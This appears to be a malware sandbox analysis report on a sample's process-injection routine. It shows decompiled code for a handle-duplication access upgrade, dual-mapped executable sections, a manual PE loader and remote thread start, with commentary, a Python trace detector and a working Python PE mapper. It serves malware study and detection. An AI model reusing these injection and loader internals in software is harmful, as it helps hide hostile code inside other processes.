                            control_flow_graph 231 401602-40162b call 401274 240 401630-401635 231->240 241 40162d 231->241 243 401956-40195e 240->243 244 40163b-40164c 240->244 241->240 243->240 247 401963-4019b3 call 401274 243->247 248 401652-40167b 244->248 249 401954 244->249 248->249 256 401681-401698 NtDuplicateObject 248->256 249->247 256->249 258 40169e-4016c2 NtCreateSection 256->258 260 4016c4-4016e5 NtMapViewOfSection 258->260 261 40171e-401744 NtCreateSection 258->261 260->261 264 4016e7-401703 NtMapViewOfSection 260->264 261->249 265 40174a-40174e 261->265 264->261 266 401705-40171b 264->266 265->249 267 401754-401775 NtMapViewOfSection 265->267 266->261 267->249 270 40177b-401797 NtMapViewOfSection 267->270 270->249 273 40179d call 4017a2 270->273
                            C-Code - Quality: 58%
                            			E00401602(void* __esi, void* __eflags) {
                            				void* _t85;
                            				intOrPtr _t88;
                            				void* _t91;
                            				intOrPtr _t92;
                            				struct _GUID _t99;
                            				struct _GUID _t101;
                            				PVOID* _t103;
                            				PVOID* _t105;
                            				intOrPtr* _t109;
                            				PVOID* _t122;
                            				PVOID* _t124;
                            				intOrPtr _t128;
                            				void** _t132;
                            				signed int _t139;
                            				int _t140;
                            				void* _t157;
                            				signed int _t161;
                            				signed int _t162;
                            				signed int _t163;
                            				signed int _t164;
                            				signed int _t165;
                            				void* _t166;
                            				intOrPtr* _t167;
                            				void* _t170;
                            				intOrPtr _t180;
                            				void* _t181;
                            				void* _t182;
                            				HANDLE* _t188;
                            				HANDLE* _t190;
                            				void* _t195;
                            				intOrPtr* _t198;
                            				void* _t201;
                            				void* _t202;
                            				void* _t204;
                            				intOrPtr* _t205;
                            				void* _t209;
                            				long _t224;
                            
                            				asm("outsb");
                            				_push(0x392);
                            				_t205 = _t204 + 4;
                            				L00401274(_t85, 0xf1, __esi, __eflags);
                            				_t128 =  *((intOrPtr*)(_t202 + 8));
                            				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                            				if(gs != 0) {
                            					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                            				}
                            				while(1) {
                            					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                            					if(_t88 != 0) {
                            						break;
                            					}
                            					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                            				}
                            				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
                            				_t188 = _t202 - 0x60;
                            				 *_t188 = 0;
                            				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
                            				_t91 =  *_t188;
                            				if(_t91 != 0) {
                            					_t132 = _t202 - 0x30;
                            					 *_t132 = _t91;
                            					_t132[1] = 0;
                            					_t188 = _t202 - 0x28;
                            					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
                            					 *_t188 = 0x18;
                            					_push(_t202 - 0x30);
                            					_push(_t188);
                            					_push(0x40);
                            					_push(_t202 - 0x10);
                            					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                            						 *((intOrPtr*)(_t202 - 8)) = 0;
                            						_t99 = _t202 - 0x50;
                            						 *((intOrPtr*)(_t99 + 4)) = 0;
                            						 *_t99 = 0x5000;
                            						_t190 = _t202 - 0x54;
                            						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                            							 *_t25 =  *(_t202 - 0x50);
                            							_t122 = _t202 - 0x44;
                            							 *_t122 = 0;
                            							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            								_t124 = _t202 - 0x3c;
                            								 *_t124 = 0;
                            								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            									_t201 =  *(_t202 - 0x44);
                            									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
                            									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                            									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                            								}
                            							}
                            						}
                            						_t101 = _t202 - 0x50;
                            						 *((intOrPtr*)(_t101 + 4)) = 0;
                            						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                            						_t188 = _t202 - 0x58;
                            						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                            							 *_t46 =  *(_t202 - 0x50);
                            							_t103 = _t202 - 0x48;
                            							 *_t103 = 0;
                            							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            								_t105 = _t202 - 0x40;
                            								 *_t105 = 0;
                            								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                            								if(_t224 == 0) {
                            									L21();
                            									if(_t224 == 0 && _t224 != 0) {
                            										asm("hlt");
                            										_push(_t205);
                            									}
                            									_push(0x2ea6);
                            									_t209 = _t205 + 4;
                            									_t161 = 0x2260;
                            									_t162 = _t161 << 5;
                            									_t163 = _t162 + 0x2260;
                            									asm("lodsb");
                            									_t164 = _t163;
                            									asm("loop 0xffffffc4");
                            									_t165 = _t164 ^ 0xad610a21;
                            									_t205 = _t209 - _t165;
                            									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                            									_t139 =  *(_t195 + 6) & 0x0000ffff;
                            									_push(_t195);
                            									_t166 = _t195;
                            									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                            										_t167 = _t166 + 0xf8;
                            										__eflags = _t167;
                            									} else {
                            										_t167 = _t166 + 0x108;
                            									}
                            									_push(_t139);
                            									_t140 =  *(_t167 + 0x10);
                            									if(_t140 != 0) {
                            										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                            										_t205 = _t205 + 0xc;
                            									}
                            									asm("loop 0xffffffe6");
                            									_pop(_t188);
                            									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                            									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                            										_push(_t188);
                            										_t170 = _t188[0xd] -  *(_t202 - 0x40);
                            										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                            										__eflags = _t198;
                            										while(1) {
                            											__eflags =  *_t198;
                            											if( *_t198 == 0) {
                            												break;
                            											}
                            											_t180 =  *_t198;
                            											_t198 = _t198 + 8;
                            											asm("lodsw");
                            											__eflags = 0;
                            											if(0 != 0) {
                            												 *0x00000000 =  *0x00000000 - _t170;
                            												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                            											}
                            											asm("loop 0xffffffe9");
                            										}
                            										_pop(_t188);
                            										__eflags = 0;
                            										_t109 = _t202 - 4;
                            										 *_t109 = 0;
                            										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
                            									} else {
                            										L54();
                            										_pop(_t181);
                            										_t182 = _t181 - 0x1892;
                            										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                            										L004012E3(_t128, _t228);
                            										0x33(_t182 + 0x304c, 0x1ad);
                            										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                            										0x33();
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_push(0x161d);
                            				_t92 =  *_t205;
                            				_push(0x392);
                            				_t157 = 0xf1;
                            				return L00401274(_t92, _t157, _t188, _t228);
			}

Instruction addresses for the listing above (one entry per decompiled line, 0x004015f4 to 0x004019b3; the per-line alignment did not survive extraction, the API call sites are given under APIs below).

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
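The seven calls above, in order, are the whole injection primitive. The target is opened with access 0x40 (the value pushed before the call at +0x70 in the listing, matching PROCESS_DUP_HANDLE), then NtDuplicateObject is called with that handle as SourceProcessHandle, SourceHandle -1 and TargetProcessHandle -1 with DUPLICATE_SAME_ACCESS (2): the -1 pseudo-handle, evaluated inside the target, is the target's own full-access handle, so duplicating it back gives the sample full access without ever requesting it from NtOpenProcess. A first section (0x5000 bytes, PAGE_READWRITE) is mapped into both processes as a shared staging buffer; a second section created with access 0xe, PAGE_EXECUTE_READWRITE (0x40) and SEC_COMMIT (0x8000000) is mapped locally as PAGE_READWRITE (4) and into the target as PAGE_EXECUTE_READ (0x20), so the payload is written through the local view and runs through the remote one. The following Python is an added example, not code from the report or the sample: it parses trace lines in the format printed above and flags that pattern. The sample trace is the seven lines from this section, and treating 000000FF as the current-process pseudo-handle (the decompiled source shows 0xffffffff) is an assumption about how the report renders -1.

```python
"""Flag section-based process injection in a Joe Sandbox style NTDLL call trace."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the seven calls listed under APIs for this function, in report order.
SAMPLE_TRACE = """
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
"""

LINE_RE = re.compile(r"^\W*(\w+)\.NTDLL\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")
PAGE_EXECUTE_ANY = 0x10 | 0x20 | 0x40 | 0x80      # any PAGE_EXECUTE* protection
DUPLICATE_SAME_ACCESS = 0x2


@dataclass
class Call:
    name: str
    args: List[Optional[int]]   # None stands for '?', an argument the tracer did not resolve
    ref: int                    # call-site address


def parse_trace(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            name, raw, ref = m.groups()
            args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
            calls.append(Call(name, args, int(ref, 16)))
    return calls


def arg(c: Call, i: int) -> Optional[int]:
    return c.args[i] if i < len(c.args) else None


def is_current_process(handle: Optional[int]) -> bool:
    # NtCurrentProcess() is -1; the report prints it as 000000FF (assumption), the decompiled
    # source shows 0xffffffff. An unresolved '?' is treated as a foreign handle (conservative).
    return handle in (0xFF, 0xFFFFFFFF)


def detect_section_injection(calls: List[Call]) -> List[Tuple[int, str]]:
    findings = []
    for i, c in enumerate(calls):
        if c.name == "NtDuplicateObject":
            # (SourceProcess, SourceHandle, TargetProcess, TargetHandle, Access, Attributes, Options)
            # SourceHandle -1 is evaluated inside SourceProcess, i.e. it is that process's own
            # full-access handle; duplicating it into ourselves upgrades a PROCESS_DUP_HANDLE handle.
            if (is_current_process(arg(c, 1)) and is_current_process(arg(c, 2))
                    and not is_current_process(arg(c, 0))
                    and (arg(c, 6) or 0) & DUPLICATE_SAME_ACCESS):
                findings.append((c.ref, "self-handle duplication out of a foreign process (access upgrade)"))
        elif c.name == "NtCreateSection":
            # (SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, PageProtection, AllocAttrs, FileHandle)
            # Pair the section with the NtMapViewOfSection calls that follow it, up to the next NtCreateSection.
            prot = arg(c, 4) or 0
            maps = []
            for d in calls[i + 1:]:
                if d.name == "NtCreateSection":
                    break
                if d.name == "NtMapViewOfSection":
                    maps.append(d)
            # (Section, Process, BaseAddress, ZeroBits, CommitSize, Offset, ViewSize, Inherit, AllocType, Win32Protect)
            local = [m for m in maps if is_current_process(arg(m, 1))]
            remote = [m for m in maps if not is_current_process(arg(m, 1))]
            if local and remote:
                remote_exec = any((arg(m, 9) or 0) & PAGE_EXECUTE_ANY for m in remote)
                if prot & PAGE_EXECUTE_ANY and remote_exec:
                    findings.append((remote[-1].ref,
                                     "section written through a local view and mapped executable into a foreign process (injection)"))
                else:
                    findings.append((remote[-1].ref, "read/write section shared with a foreign process (staging buffer)"))
    return findings


if __name__ == "__main__":
    for ref, why in detect_section_injection(parse_trace(SAMPLE_TRACE)):
        print(f"{ref:08X}  {why}")
```

Run against the sample trace it reports three findings: the handle upgrade at 0x401690, the shared read/write staging section at 0x4016FE and the dual-mapped executable section at 0x401792. Pairing each NtCreateSection with the maps that follow it is a simplification (the trace does not expose handle values); on a trace that does, key the pairing on the section handle instead.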
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 96db63f7d77d4681a7c8b0b211a7f1c9fea7a796f5373a4cc62486394675adc4
                            • Instruction ID: ddd3f8d359e1be272fa8e6b980a73181fe92d2cf62f6648a3517e1c41251e5f0
                            • Opcode Fuzzy Hash: 96db63f7d77d4681a7c8b0b211a7f1c9fea7a796f5373a4cc62486394675adc4
                            • Instruction Fuzzy Hash: 4C5108B4900245BBEF209F91CC48FEBBBB8EF85B00F140169FA11BA2A5D6759945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
Control-flow graph (basic blocks with their address range, the API or call they contain, and their successors; reconstructed from the flattened graph dump):
• 275: 401605-40162b, call 401274 -> 282, 283
• 282: 401630-401635 -> 285, 286
• 283: 40162d -> 282
• 285: 401956-40195e -> 282, 289
• 286: 40163b-40164c -> 290, 291
• 289: 401963-4019b3, call 401274
• 290: 401652-40167b -> 291, 298
• 291: 401954 -> 289
• 298: 401681-401698, NtDuplicateObject -> 291, 300
• 300: 40169e-4016c2, NtCreateSection -> 302, 303
• 302: 4016c4-4016e5, NtMapViewOfSection -> 303, 306
• 303: 40171e-401744, NtCreateSection -> 291, 307
• 306: 4016e7-401703, NtMapViewOfSection -> 303, 308
• 307: 40174a-40174e -> 291, 309
• 308: 401705-40171b -> 303
• 309: 401754-401775, NtMapViewOfSection -> 291, 312
• 312: 40177b-401797, NtMapViewOfSection -> 291, 315
• 315: 40179d, call 4017a2
                            C-Code - Quality: 58%
                            			E00401605(void* __esi, void* __eflags) {
                            				void* _t85;
                            				intOrPtr _t88;
                            				void* _t91;
                            				intOrPtr _t92;
                            				struct _GUID _t99;
                            				struct _GUID _t101;
                            				PVOID* _t103;
                            				PVOID* _t105;
                            				intOrPtr* _t109;
                            				PVOID* _t122;
                            				PVOID* _t124;
                            				intOrPtr _t128;
                            				void** _t131;
                            				signed int _t138;
                            				int _t139;
                            				void* _t156;
                            				signed int _t160;
                            				signed int _t161;
                            				signed int _t162;
                            				signed int _t163;
                            				signed int _t164;
                            				void* _t165;
                            				intOrPtr* _t166;
                            				void* _t169;
                            				intOrPtr _t179;
                            				void* _t180;
                            				void* _t181;
                            				HANDLE* _t187;
                            				HANDLE* _t189;
                            				void* _t194;
                            				intOrPtr* _t197;
                            				void* _t200;
                            				void* _t201;
                            				intOrPtr* _t203;
                            				void* _t207;
                            				long _t222;
                            
                            				asm("scasb");
                            				L00401274(_t85, 0xf1, __esi, __eflags);
                            				_t128 =  *((intOrPtr*)(_t201 + 8));
                            				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                            				if(gs != 0) {
                            					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                            				}
                            				while(1) {
                            					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                            					if(_t88 != 0) {
                            						break;
                            					}
                            					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                            				}
                            				 *((intOrPtr*)(_t201 - 0x5c)) = _t88;
                            				_t187 = _t201 - 0x60;
                            				 *_t187 = 0;
                            				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t187);
                            				_t91 =  *_t187;
                            				if(_t91 != 0) {
                            					_t131 = _t201 - 0x30;
                            					 *_t131 = _t91;
                            					_t131[1] = 0;
                            					_t187 = _t201 - 0x28;
                            					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
                            					 *_t187 = 0x18;
                            					_push(_t201 - 0x30);
                            					_push(_t187);
                            					_push(0x40);
                            					_push(_t201 - 0x10);
                            					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, 0, 0, 2) == 0) {
                            						 *((intOrPtr*)(_t201 - 8)) = 0;
                            						_t99 = _t201 - 0x50;
                            						 *((intOrPtr*)(_t99 + 4)) = 0;
                            						 *_t99 = 0x5000;
                            						_t189 = _t201 - 0x54;
                            						if(NtCreateSection(_t189, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                            							 *_t25 =  *(_t201 - 0x50);
                            							_t122 = _t201 - 0x44;
                            							 *_t122 = 0;
                            							if(NtMapViewOfSection( *_t189, 0xffffffff, _t122, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                            								_t124 = _t201 - 0x3c;
                            								 *_t124 = 0;
                            								if(NtMapViewOfSection( *_t189,  *(_t201 - 0xc), _t124, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                            									_t200 =  *(_t201 - 0x44);
                            									 *((intOrPtr*)(_t128 + 0x20))(0, _t200, 0x104);
                            									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                            									 *((intOrPtr*)(_t201 - 8)) =  *((intOrPtr*)(_t201 - 8)) + 1;
                            								}
                            							}
                            						}
                            						_t101 = _t201 - 0x50;
                            						 *((intOrPtr*)(_t101 + 4)) = 0;
                            						 *_t101 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                            						_t187 = _t201 - 0x58;
                            						if(NtCreateSection(_t187, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t201 - 8)) != 0) {
                            							 *_t46 =  *(_t201 - 0x50);
                            							_t103 = _t201 - 0x48;
                            							 *_t103 = 0;
                            							if(NtMapViewOfSection( *_t187, 0xffffffff, _t103, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                            								_t105 = _t201 - 0x40;
                            								 *_t105 = 0;
                            								_t222 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t105, 0, 0, 0, _t201 - 0x38, 1, 0, 0x20);
                            								if(_t222 == 0) {
                            									L19();
                            									if(_t222 == 0 && _t222 != 0) {
                            										asm("hlt");
                            										_push(_t203);
                            									}
                            									_push(0x2ea6);
                            									_t207 = _t203 + 4;
                            									_t160 = 0x2260;
                            									_t161 = _t160 << 5;
                            									_t162 = _t161 + 0x2260;
                            									asm("lodsb");
                            									_t163 = _t162;
                            									asm("loop 0xffffffc4");
                            									_t164 = _t163 ^ 0xad610a21;
                            									_t203 = _t207 - _t164;
                            									_t194 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                            									_t138 =  *(_t194 + 6) & 0x0000ffff;
                            									_push(_t194);
                            									_t165 = _t194;
                            									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                            										_t166 = _t165 + 0xf8;
                            										__eflags = _t166;
                            									} else {
                            										_t166 = _t165 + 0x108;
                            									}
                            									_push(_t138);
                            									_t139 =  *(_t166 + 0x10);
                            									if(_t139 != 0) {
                            										memcpy( *((intOrPtr*)(_t166 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t166 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t139);
                            										_t203 = _t203 + 0xc;
                            									}
                            									asm("loop 0xffffffe6");
                            									_pop(_t187);
                            									_t226 =  *((intOrPtr*)(_t201 - 0x34));
                            									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                            										_push(_t187);
                            										_t169 = _t187[0xd] -  *(_t201 - 0x40);
                            										_t197 = _t187[0x28] +  *(_t201 - 0x48);
                            										__eflags = _t197;
                            										while(1) {
                            											__eflags =  *_t197;
                            											if( *_t197 == 0) {
                            												break;
                            											}
                            											_t179 =  *_t197;
                            											_t197 = _t197 + 8;
                            											asm("lodsw");
                            											__eflags = 0;
                            											if(0 != 0) {
                            												 *0x00000000 =  *0x00000000 - _t169;
                            												__eflags =  *((intOrPtr*)( *(_t201 - 0x48) + 0 + _t179));
                            											}
                            											asm("loop 0xffffffe9");
                            										}
                            										_pop(_t187);
                            										__eflags = 0;
                            										_t109 = _t201 - 4;
                            										 *_t109 = 0;
                            										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0, _t187[0xa] +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t109, 0);
                            									} else {
                            										L52();
                            										_pop(_t180);
                            										_t181 = _t180 - 0x1892;
                            										 *((intOrPtr*)(_t181 + 0x18c6)) = _t181 + 0x304c;
                            										L004012E3(_t128, _t226);
                            										0x33(_t181 + 0x304c, 0x1ad);
                            										 *((intOrPtr*)(_t181 + 0x18eb)) = _t181 + 0x309c;
                            										0x33();
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_push(0x161d);
                            				_t92 =  *_t203;
                            				_push(0x392);
                            				_t156 = 0xf1;
                            				return L00401274(_t92, _t156, _t187, _t226);
			}

Instruction addresses for the listing above (one entry per decompiled line, 0x00401605 to 0x004019b3; the per-line alignment did not survive extraction, the API call sites are given under APIs below).
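The block between the second NtMapViewOfSection and the 10-argument thread-creation call through the resolved pointer at +0x98 is a manual PE loader. NumberOfSections is read at e_lfanew+6, the section table is taken at NT headers +0xf8 (PE32) or +0x108 (PE32+), selected by the flag set from gs at the top of the function (consistent with a 32-bit versus 64-bit OS check), and each section is copied as memcpy(localView + VirtualAddress, file + PointerToRawData, SizeOfRawData). On the 32-bit path the base relocation directory (NT headers +0xa0) is then walked in the local view and every target is adjusted by the difference between the remote base and ImageBase (+0x34), after which a thread is started in the target at remote base + AddressOfEntryPoint (+0x28) with the remote view of the first section as its parameter. The decompiled relocation loop is not readable as emitted (lodsw/loop residue), so the following Python is an added example, not code from the report or the sample, that performs the same section copy and relocation on a constructed minimal PE32 using the same header offsets. The PE builder, the new base 0x7FF00000 and the DIR64 branch for 64-bit images are assumptions for illustration.

```python
"""Manual PE mapping with base relocation, using the header offsets seen in the decompiled loader."""
import struct


def u16(buf, off): return struct.unpack_from("<H", buf, off)[0]
def u32(buf, off): return struct.unpack_from("<I", buf, off)[0]
def u64(buf, off): return struct.unpack_from("<Q", buf, off)[0]


def manual_map(pe: bytes, new_base: int):
    """Copy sections into a fresh image buffer and relocate it to new_base.
    Returns (image, absolute entry point)."""
    nt = u32(pe, 0x3C)                              # e_lfanew
    pe32plus = u16(pe, nt + 0x18) == 0x20B           # OptionalHeader.Magic
    nsec = u16(pe, nt + 6)                           # FileHeader.NumberOfSections (the *(nt+6) read)
    sec_tbl = nt + (0x108 if pe32plus else 0xF8)     # section table: +0xf8 PE32, +0x108 PE32+
    image = bytearray(u32(pe, nt + 0x50))            # SizeOfImage
    for i in range(nsec):
        h = sec_tbl + 40 * i
        va, raw_size, raw_ptr = u32(pe, h + 0xC), u32(pe, h + 0x10), u32(pe, h + 0x14)
        if raw_size:                                 # memcpy(local + VA, file + PointerToRawData, SizeOfRawData)
            image[va:va + raw_size] = pe[raw_ptr:raw_ptr + raw_size]
    if pe32plus:                                     # assumption: 64-bit layout, not shown in the 32-bit path
        image_base, dir_off = u64(pe, nt + 0x30), nt + 0xB0
    else:
        image_base, dir_off = u32(pe, nt + 0x34), nt + 0xA0   # ImageBase, DataDirectory[5] (base reloc)
    delta = new_base - image_base                    # the loader computes ImageBase - remote and subtracts it
    rva = u32(pe, dir_off)
    end = rva + u32(pe, dir_off + 4)
    while rva < end:                                 # walk IMAGE_BASE_RELOCATION blocks in the mapped image
        page_rva, block_size = u32(image, rva), u32(image, rva + 4)
        if page_rva == 0 or block_size < 8:          # the decompiled loop stops on a zero VirtualAddress
            break
        for off in range(rva + 8, rva + block_size, 2):
            entry = u16(image, off)
            kind, target = entry >> 12, page_rva + (entry & 0xFFF)
            if kind == 3:                            # IMAGE_REL_BASED_HIGHLOW: 32-bit absolute address
                struct.pack_into("<I", image, target, (u32(image, target) + delta) & 0xFFFFFFFF)
            elif kind == 10:                         # IMAGE_REL_BASED_DIR64 (assumption for 64-bit payloads)
                struct.pack_into("<Q", image, target, (u64(image, target) + delta) & 0xFFFFFFFFFFFFFFFF)
        rva += block_size
    return image, new_base + u32(pe, nt + 0x28)      # AddressOfEntryPoint


def build_sample_pe32() -> bytes:
    """Constructed test image: .text at RVA 0x1000 holds `mov eax,[0x401010]; ret`, .reloc fixes its operand."""
    image_base, entry_rva = 0x400000, 0x1000
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)                           # e_lfanew = 0x40
    file_hdr = struct.pack("<IHHIIIHH", 0x4550, 0x14C, 2, 0, 0, 0, 0xE0, 0x102)   # PE\0\0, i386, 2 sections
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                                      # Magic: PE32
    struct.pack_into("<I", opt, 0x10, entry_rva)                                  # AddressOfEntryPoint (NT+0x28)
    struct.pack_into("<I", opt, 0x1C, image_base)                                 # ImageBase (NT+0x34)
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)                             # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 0x38, 0x3000, 0x200)                             # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 0x5C, 16)                                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 0x60 + 5 * 8, 0x2000, 12)                        # DataDirectory[5] (NT+0xa0)

    def sec(name, va, raw_ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, 0x200, va, 0x200, raw_ptr, 0, 0, 0, 0, chars)

    headers = dos + file_hdr + opt + sec(b".text", 0x1000, 0x200, 0x60000020) + sec(b".reloc", 0x2000, 0x400, 0x42000040)
    text = (b"\xA1" + struct.pack("<I", image_base + 0x1010) + b"\xC3").ljust(0x200, b"\0")
    reloc = struct.pack("<IIHH", 0x1000, 12, (3 << 12) | 0x001, 0).ljust(0x200, b"\0")  # one HIGHLOW entry + pad
    return headers.ljust(0x200, b"\0") + text + reloc


if __name__ == "__main__":
    img, ep = manual_map(build_sample_pe32(), 0x7FF00000)
    print(hex(ep), hex(u32(img, 0x1001)))
```

Mapping the constructed image to 0x7FF00000 moves the entry point to 0x7FF01000 and rewrites the operand at RVA 0x1001 from 0x401010 to 0x7FF01010; mapping it back to its preferred base leaves the operand untouched, which is the check to run on any loader reimplementation before trusting its output.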

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 415a5842a2c5ec0b738834669aaf024952b371ede68f2027b92f6496f3657053
                            • Instruction ID: 1fcee3e81df0436361f0f1364465162f3818ae34080ff9e07162e38916551545
                            • Opcode Fuzzy Hash: 415a5842a2c5ec0b738834669aaf024952b371ede68f2027b92f6496f3657053
                            • Instruction Fuzzy Hash: 8451F8B5900249BBEF209F91CC48FEFBFB8EF85B10F140159FA11BA2A5D6749945CB24
